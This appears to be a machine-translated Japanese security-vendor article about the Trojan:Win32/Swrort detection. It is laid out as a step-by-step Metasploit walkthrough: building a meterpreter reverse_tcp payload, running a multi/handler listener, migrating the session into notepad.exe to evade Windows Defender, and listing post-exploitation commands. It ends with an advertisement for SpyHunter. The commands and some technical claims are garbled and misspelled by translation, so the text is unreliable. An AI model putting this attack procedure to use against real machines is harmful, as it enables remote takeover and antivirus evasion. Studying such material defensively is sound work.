| 名前 | トロイの木馬:Win32 / Swrort |
| タイプ | トロイの木馬 |
| 簡単な説明 | Windowsでの読み取りおよび書き込み権限 10. 攻撃者が感染したPCに接続されている他のPCに感染することを許可します. |
| 症状 | なじみのない.exeファイルが表示される. |
| 配布方法 | スパムメール. MiTM攻撃, 悪意のあるリダイレクト. |
| 検出ツール | SpyHunterをダウンロード, システムがトロイの木馬の影響を受けているかどうかを確認する:Win32 / Swrort |
Windowsで危険なエクスプロイトが発見されました 10, を使って トロイの木馬:Win32 / Swrort Windows Defenderをバイパスして、読み取りおよび書き込み権限を取得する. 匿名の研究者がチャネルからの脆弱性を実証しました, と呼ばれる Metasploitstation. 彼が示しています 3 Windowsをすり抜けることができるフェーズ 10 防御. このエクスプロイトが修正されたかどうかについて、これまでに発見された情報はありませんでした。.
ウィンドウズ 10 マルチハンドラーエクスプロイト感染 – どうやってするの?
ビデオで, 技術に精通したユーザーは、「123.exe」ファイルのシミュレーションを実演しました。このファイルは、電子メールの添付ファイルとして、または別の方法で実行されたかのように、現実の世界で開かれたかのように作成および実行されます。. 方法論をよりよく理解できるように、感染プロセスを3つのフェーズに分割することにしました。.
段階 1: ファイルの準備
ハッカーは、Linux環境でこの構成を使用してペイロードを作成します:
→msfpaayload windows / Meterpreter / reverse_tcp LHOST =
ポート番号1* – これは攻撃に使用されるポートです. 任意のポートにすることができます (4444, 4324, 等). 彼は私たちが名前を付けた2番目のポート番号を使用しているので、私たちはportnumber1を書きました
このフェーズが完了し、ファイルが攻撃者によって作成され、ユーザーシステムにドロップされた後, 攻撃者はフェーズに進む可能性があります 2.
段階 2: エクスプロイトの使用.
この時点で, 攻撃者はマルチハンドラーを使用して.exeを表示させ、エクスプロイトを利用してアクティブなセッションを開きます(接続) 被害者のPCに.
これは、現在のコマンドラインを使用して発生する可能性があります:
→msfconsole (コンソールを起動するには. 'msf>'インターフェイスを開きます)
'msf'では、攻撃者は次のコマンドを実行できます:
→msf> use explore / multi / handler
lhostの犠牲者のIPアドレスを設定します’
set lport'portnumber1’
その後, 攻撃者はペイロードを実行してセッションを確立します:
→msfexploit(ハンドラ)>ペイロードウィンドウ/meterpreter/reverse_tcpを設定します
アクティブなセッションが可能かどうかを確認するには, 攻撃者はコマンドmsfexploitを作成します(ハンドラ)>彼がこれを見ることができるようにするオプションを表示する
→EXITFUNCプロセスはい終了テクニック(受け入れられました: seh, スレッド..)
LHOST被害者のIPアドレスはいリッスンポート
LPORTポート番号1はいリッスンアドレス
これにより、彼は設定が正しく構成されていることを確認でき、コンピューターの実際の感染を続行できる可能性があります。.
段階 3: 感染
攻撃者が被害者とのアクティブなセッションを開始するために使用するコマンドは次のとおりです。 「エクスプロイト」. このコマンドを実行した後, この応答で返されたファイル「123.exe」:
→[*] でリバースハンドラーを開始しました
[*] ペイロードハンドラーの開始…
この時点で, 実行可能ファイルがWindowsマシンで開始されました. WindowsDefenderソフトウェアが実行されていたという事実にもかかわらず, それは攻撃を止めませんでした. ただし、ウイルスをスキャンすると, Windowsアンチウイルスプログラムはすぐに「123.exe」をトロイの木馬として検出しました:Win32 / Swrort.A.
検出を回避するには, 攻撃者は戦術を使用しました, 移行と呼ばれ、接続時にアクティブなセッションを「123.exe」からこのファイルに移行する「notepad.exe」ファイルを作成しました. これは、コマンドを使用して行われました:
→Meterpreter> run post / windows / manage / migrate
プロセスを移行し、同じシミュレーションを繰り返した後、
そこから, 攻撃者は、新しいテキストドキュメントで新しいフォルダを作成することにより、完全な読み取りおよび書き込み権限を示しました. 私たちが知る限り、接続後に使用できる主なコマンドは次のとおりです。:
→> sysinfo –システムのバージョンと情報を表示します.
> dir :/
> shell –Windowsのバージョンとその他の情報を表示します.
> getwid –WindowsIDを表示します.
> ps –aux –Windowsタスクマネージャーで実行されているすべての.exeファイルを表示します.
> ifconfig –インターフェースに関する情報を表示します (IPアドレスおよびその他の情報). このコマンドは、攻撃者に、感染したPCと同じNICおよびVLANにある別のコンピュータに接続するための情報を提供します。. このような攻撃が適切に組織化されている場合、これはホームネットワークまたはオフィスネットワークにとって非常に壊滅的なものになる可能性があります。.
ウィンドウズ 10 エクスプロイト – 結論
このエクスプロイトが修正されたかどうかについての実際の情報はありませんが、他のソフトウェアと同様です。, カバーされていないものがもっとあるかもしれません. これが、Windowsを使用している場合の理由です。 10, 高度なマルウェア保護プログラムをダウンロードしてインストールすることをお勧めします. それは積極的にあなたを保護し、最新の脅威で定期的に自分自身を更新します. また, このようなプログラムには、不正な接続を即座に検出するアクティブなシールドがあります.
スパイハンタースキャナーは脅威のみを検出します. 脅威を自動的に削除したい場合, マルウェア対策ツールのフルバージョンを購入する必要があります.SpyHunterマルウェア対策ツールの詳細をご覧ください / SpyHunterをアンインストールする方法
